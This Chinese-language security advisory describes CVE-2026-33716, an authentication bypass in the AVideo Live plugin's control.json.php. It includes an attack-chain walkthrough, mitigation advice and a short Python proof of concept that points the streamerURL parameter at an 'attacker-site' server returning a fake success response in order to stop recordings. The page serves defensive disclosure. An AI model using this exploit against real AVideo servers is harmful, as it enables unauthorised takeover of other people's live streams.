IPBUF安全漏洞报告
English
CVE-2026-33716 CVSS 9.4 严重

CVE-2026-33716 AVideo直播流认证绕过漏洞

披露日期: 2026-03-23

漏洞信息

漏洞编号
CVE-2026-33716
漏洞类型
认证绕过
CVSS评分
9.4 严重
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
WWBN AVideo

相关标签

认证绕过AVideo逻辑漏洞直播安全SSRF

漏洞概述

WWBN AVideo是一个开源视频平台。在26.0及以下版本中,其Live插件的`control.json.php`端点存在严重漏洞。该端点未严格校验用户提供的`streamerURL`参数,允许攻击者将其覆盖为恶意服务器地址。通过这种方式,攻击者可重定向令牌验证请求,绕过身份验证机制,从而在未认证的情况下控制平台上的任意直播流,执行断开发布者、启停录制等高危操作。

技术细节

该漏洞位于`plugin/Live/standAloneFiles/control.json.php`文件中。该接口用于处理直播流的控制指令,并依赖外部请求来验证令牌的有效性。关键问题在于代码直接信任了用户传入的`streamerURL`参数,并将其作为验证请求的目标地址。攻击者可以利用此缺陷,构造包含恶意`streamerURL`的HTTP请求。当AVideo服务器向该恶意地址发起验证时,攻击者控制的服务器只需返回`{"error": false}`,即可欺骗AVideo服务器认为请求已获授权。由于该漏洞无需用户交互且无需预先认证,攻击者可利用此漏洞接管直播流管理权限,导致平台完整性受损。

攻击链分析

STEP 1
侦察
攻击者扫描网络,识别使用WWBN AVideo且版本在26.0及以下的目标。
STEP 2
漏洞利用
攻击者向`/plugin/Live/standAloneFiles/control.json.php`发送特制的POST请求,将`streamerURL`参数指向自己控制的服务器。
STEP 3
认证绕过
目标AVideo服务器向攻击者的服务器发送令牌验证请求,攻击者的服务器返回`{"error": false}`,欺骗目标服务器验证通过。
STEP 4
执行操作
目标服务器执行攻击者请求的控制指令(如停止录制、断开播主等),实现对直播流的未授权控制。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target AVideo instance endpoint # 目标 AVideo 实例端点 target_url = "http://target-site/plugin/Live/standAloneFiles/control.json.php" # Attacker controlled server that returns {"error": false} # 攻击者控制的服务器,返回 {"error": false} evil_server = "http://attacker-site/fake_auth.php" # Data payload exploiting the vulnerable streamerURL parameter # 利用易受攻击的 streamerURL 参数的数据负载 payload = { "action": "stopRecording", # Action to perform on the stream (对流执行的操作) "streamerURL": evil_server # Malicious override URL (恶意覆盖URL) } try: # Send the exploit request # 发送利用请求 response = requests.post(target_url, data=payload) print(f"Status Code: {response.status_code}") print(f"Response Body: {response.text}") except Exception as e: print(f"Exploit failed: {e}")

影响范围

WWBN AVideo <= 26.0

防御指南

临时缓解措施
建议立即检查AVideo系统版本,若受影响则务必应用官方提供的补丁代码。临时缓解方案包括在Web服务器配置中禁用对`plugin/Live/standAloneFiles/control.json.php`文件的访问权限,或通过代码审计移除对`streamerURL`参数的信任,强制使用内部白名单验证机制。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表